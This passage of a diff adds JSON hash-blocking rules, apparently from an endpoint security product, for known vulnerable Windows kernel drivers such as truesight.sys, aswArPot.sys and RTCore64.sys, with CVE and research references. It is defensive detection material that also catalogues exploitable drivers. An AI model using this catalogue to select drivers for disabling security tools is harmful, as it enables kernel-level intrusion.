+ "value": "ad0de41b0a8f65fd1e8a07f3ba20e2a833f195f31ad4706da7b74a6fb04f3a91",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "640594d7-4a65-54ec-9f77-847d3b4c01ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160304Z",
+ "creation_date": "2026-03-23T11:45:31.160306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "344b57aa48f2ef39cd7f1be46946c7d86c6f6ea0e018a4cc6033587cf366b299",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6414090d-24c6-5d87-9fdf-888a0f4e4a78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474121Z",
+ "creation_date": "2026-03-23T11:45:31.474125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474135Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d6f6cee30083462666718fa3cf9e83371a5df3b0826328122fa5497270ea605",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "641b611d-ffb0-5be6-90e7-7b6916bdccc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974856Z",
+ "creation_date": "2026-03-23T11:45:29.974859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d6fe20c9f7ccfe723bf7feecb5acf773a85cb61286452dc4001589f82b1a424",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "642dd934-687f-5cb8-bc6b-9ab5f3fb6c17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983772Z",
+ "creation_date": "2026-03-23T11:45:29.983774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5b0772be02e2bc807804874cf669e97aa36f5aff1f12fa0a631a3c7b4dd0dc8",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "642ec52e-34b4-59c9-89df-11ad44572906",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475562Z",
+ "creation_date": "2026-03-23T11:45:30.475565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475574Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d53f9111a5e6c94b37e3f39c5860897405cb250dd11aa91c3814a98b1759c055",
+ "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "643a5106-3616-5edc-b3b4-32f5358f9782",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829220Z",
+ "creation_date": "2026-03-23T11:45:30.829222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19f8229e01786a26efbc4edb0a2e4487bd920e25054a9f41118c7947a4eb5794",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64472055-888b-5233-87a7-18a1932eb478",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823890Z",
+ "creation_date": "2026-03-23T11:45:31.823893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823901Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44de27f89ff24682b904d4810849fd22a5e79e989e08c34c4940b4cdb0e7698f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "645d1e4b-a68f-51e0-9796-15abc87560cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817105Z",
+ "creation_date": "2026-03-23T11:45:30.817107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "070ff602cccaaef9e2b094e03983fd7f1bf0c0326612eb76593eabbf1bda9103",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "646bbcd0-bd96-5c61-965f-99f1fc44f617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968862Z",
+ "creation_date": "2026-03-23T11:45:29.968864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968882Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1078af0c70e03ac17c7b8aa5ee03593f5decfef2f536716646a4ded1e98c153c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "646d9987-13f2-58c3-ac91-9e4584600946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608068Z",
+ "creation_date": "2026-03-23T11:45:29.608070Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608076Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61a1f530a5d47339275657d7883911d64f64909569cf13d2e6868df01a2a72cb",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "647d660d-2536-54f9-997e-b24a65505b99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816424Z",
+ "creation_date": "2026-03-23T11:45:31.816427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816435Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9d5c61da080a0e5d2127db2bc9d44b3f3c70c202c9552150bc69c7d4c94b0d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6487129e-6d15-540a-be35-5bbd3c3b2c0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825467Z",
+ "creation_date": "2026-03-23T11:45:30.825469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c8c0e8d9879f07f7d997d099d40d23a5bced78cc68296f2800577ab3478487f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "648972ef-a734-5dfe-8422-500d7a40bbaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160909Z",
+ "creation_date": "2026-03-23T11:45:31.160911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62b03c697cbda97c47abd8fa1ee9e15261f84fb274ac52d4673dab775cd161dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "649b83ce-df00-54a5-84d6-2b0965b294df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142664Z",
+ "creation_date": "2026-03-23T11:45:31.142666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff1a608df20f499b494851dab969088196a3115bafc4999e68e4144788bf8264",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "649d9ebb-0710-5c1f-8b69-a4981f55eb1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819336Z",
+ "creation_date": "2026-03-23T11:45:31.819338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819344Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "837e2910d122f44501328bb217bbcda4dffdda8739fbcbf99d57171f42d19d8c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "649ed89c-c44c-51c6-bfd3-b2eed6c4eb6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480770Z",
+ "creation_date": "2026-03-23T11:45:30.480772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480777Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31e2e5c3290989e8624820cf5af886fd778ee8187fed593f33a6178f65103f37",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64a4bf5b-4b9f-542f-91a0-efb3f744a4fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822529Z",
+ "creation_date": "2026-03-23T11:45:30.822531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28bac5dbcdd887f35f8fef454d5df1f53c18a90c51d8222636f487a0f351f725",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64a8b70d-ba09-5f80-8397-487b50e5b915",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622208Z",
+ "creation_date": "2026-03-23T11:45:29.622210Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622216Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6191c20426dd9b131122fb97e45be64a4d6ce98cc583406f38473434636ddedc",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64aa82d4-7da8-59d2-9945-0cf763a7e43e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978388Z",
+ "creation_date": "2026-03-23T11:45:29.978390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978395Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "496f4a4021226fb0f1b5f71a7634c84114c29faa308746a12c2414adb6b2a40b",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64b41444-2a48-57a5-9c2a-769dc5a6630d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608759Z",
+ "creation_date": "2026-03-23T11:45:29.608761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "596ada5ecd89f53ec997c6791bc8f97dd9fbe3e9433b4eb086d7f4e1843aeb67",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64b6ae9b-e600-5e8e-8537-73e71a19bee4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812134Z",
+ "creation_date": "2026-03-23T11:45:31.812136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812142Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b84a41a74ed61893ec976321dc761ee72385326e7ea2f46a1238f7af86f6787a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64b7b2bd-2105-52f2-b35f-b96d6a596a16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150495Z",
+ "creation_date": "2026-03-23T11:45:31.150497Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a77dee1db0339390fa27b11bb8e9e5a42456bff8475c56897ebf075ac0edb67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "64d337d3-b02c-55ae-b66c-df6daee543f4",
